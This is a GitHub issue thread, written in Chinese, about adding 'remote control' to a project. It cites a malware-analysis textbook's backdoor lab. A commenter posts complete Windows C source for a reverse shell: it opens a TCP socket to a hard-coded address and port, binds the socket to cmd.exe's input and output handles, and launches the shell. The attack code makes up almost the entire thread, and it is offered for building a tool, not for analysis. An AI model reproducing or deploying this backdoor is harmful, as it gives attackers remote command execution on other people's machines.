### ISSUE TITLE
远程控制

### ISSUE THREAD

**Issue by Marsman1996** [Marsman1996/PoSS#10]
也许参考 **Lab09-02** 中的
*设置stdout、stderr和stdin的句柄到socket（被用在CreateProcessA的STARTUPINFO结构中）。由于cmd作为CreateProcessA的参数调用，因此通过绑定一个套接字与命令shell来创建逆向shell*

或者《恶意代码分析实战》CH11.2 backdoor

**Comment by BlackDiamond1995** [comment]
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

int main()
{
	WSADATA wsaData;
	SOCKET Winsock;
	struct sockaddr_in sin;
	char ip_addr[16] = "127.0.0.1";
	char port[6] = "6666";

	STARTUPINFO start_info;

	PROCESS_INFORMATION process_info;

	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);


	struct hostent *host;
	host = gethostbyname(ip_addr);
	strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

	sin.sin_family = AF_INET;
	sin.sin_port = htons(atoi(port));
	sin.sin_addr.s_addr = inet_addr(ip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);

	memset(&start_info, 0, sizeof(start_info));
	start_info.cb = sizeof(start_info);
	start_info.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
	start_info.hStdInput = start_info.hStdOutput = start_info.hStdError = (HANDLE)Winsock;

	TCHAR cmd[255] = TEXT("cmd.exe");

	CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &start_info, &process_info);

	return 0;
}
